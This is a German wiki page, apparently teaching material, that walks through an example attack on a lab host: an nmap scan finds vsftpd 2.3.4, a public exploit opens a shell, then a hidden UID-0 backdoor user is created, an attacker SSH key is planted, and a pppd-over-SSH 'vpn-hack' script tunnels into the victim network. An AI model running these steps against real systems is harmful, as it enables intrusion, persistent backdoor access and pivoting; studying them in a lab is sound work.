Exemplarischer Angriff: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 27: Zeile 27:
 
  Retype new UNIX password: www2www
 
  Retype new UNIX password: www2www
 
  passwd: password updated successfully
 
  passwd: password updated successfully
==SSH Key hinterlegen==
 
  
 
=VPN einrichten um Zugriff zum Netz zu erlangen=
 
=VPN einrichten um Zugriff zum Netz zu erlangen=
 
*apt-get install ppp
 
*apt-get install ppp
 
=Angreifer=
 
=Angreifer=
==vpn-gateway==
+
==SSH Key hinterlegen==
 +
*ssh www@10.80.100.105 -p 22
 +
*mkdir ~/ssh
 +
*vi ~/ssh/authorized_keys
 +
<pre>
 +
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+rWoog0qiNkmLlTQ+nCVo7F4JFWzzOYo1MVa6pgLmiH1pUz5J+xowgLlJrt7uTCVxnrafS8VanQhm3xQuvZxdFxxxxxxLtUs1UdvBuWxhZhPAodDU/fvubM802tiPjiVH5oH85tVXV9Oehua8WzV8uL4nI2DfozFwjm568onK4Th+WwJ/JYjMFLMGQjz0WGGpcGzmJhHv/21R6/IrVxy/ohYt2upV9lq2QlABhMKPcahINCutlb6h2qGdfRsBGw3yOXAME2X4wSbLA31rrthVcdLiv48= Thomas Will
 +
</pre>
 +
==Vpn-Gateway==
 
*./bin/vpn-hack
 
*./bin/vpn-hack
 
<syntaxhighlight lang="bash">
 
<syntaxhighlight lang="bash">

Version vom 7. Oktober 2021, 15:34 Uhr

Angreifer

Scan

  • nmap -sV 10.80.100.105 -p 21
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-07 16:56 CEST
Nmap scan report for 10.80.100.105
Host is up (0.00056s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
Service Info: OS: Unix

Nach Exploit googlen

vsftpd 2.3 4 exploit-db

Exploit finden

Exploit ausführen

  • python vsftp.py 10.80.100.105
Success, shell opened
Send `exit` to quit shell

Opfer

Läuft ssh?

  • netstat -lntp | grep 22
tcp6  0      0 :::22   :::*  LISTEN      4360/sshd

User anlegen

  • useradd -m -o -u 0 -s /bin/bash -d /var/www www
  • passwd www
Enter new UNIX password: www2www
Retype new UNIX password: www2www
passwd: password updated successfully

VPN einrichten um Zugriff zum Netz zu erlangen

  • apt-get install ppp

Angreifer

SSH Key hinterlegen

  • ssh www@10.80.100.105 -p 22
  • mkdir ~/ssh
  • vi ~/ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+rWoog0qiNkmLlTQ+nCVo7F4JFWzzOYo1MVa6pgLmiH1pUz5J+xowgLlJrt7uTCVxnrafS8VanQhm3xQuvZxdFxxxxxxLtUs1UdvBuWxhZhPAodDU/fvubM802tiPjiVH5oH85tVXV9Oehua8WzV8uL4nI2DfozFwjm568onK4Th+WwJ/JYjMFLMGQjz0WGGpcGzmJhHv/21R6/IrVxy/ohYt2upV9lq2QlABhMKPcahINCutlb6h2qGdfRsBGw3yOXAME2X4wSbLA31rrthVcdLiv48= Thomas Will

Vpn-Gateway

  • ./bin/vpn-hack
#!/bin/bash
REMOTE_IP="$1"
LOCAL_NET=10.86.0.0/16
REMOTE_NET="$2"
########
PATH=/usr/local/sbin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/bin/X11/:
ADD_SNAT="iptables -t nat -A POSTROUTING -s 172.29.29.2 -j MASQUERADE -o eth0"
FLUSH_SNAT="iptables -t nat -F"
     echo  "Starting vpn to localhost -p 9922: " 
     pppd updetach noauth passive pty "ssh -P ${REMOTE_IP} -p 22  -o Batchmode=yes pppd nodetach notty noauth" ipparam vpn 172.29.29.2:172.29.29.1 
     route  add -net ${REMOTE_NET} gw 172.29.29.1 
     ssh -P localhost -p 9922  ${FLUSH_SNAT} 
     ssh -P localhost -p 9922  ${ADD_SNAT}
Abgerufen von „http://wiki.ixheim.de/index.php?title=Exemplarischer_Angriff&oldid=28720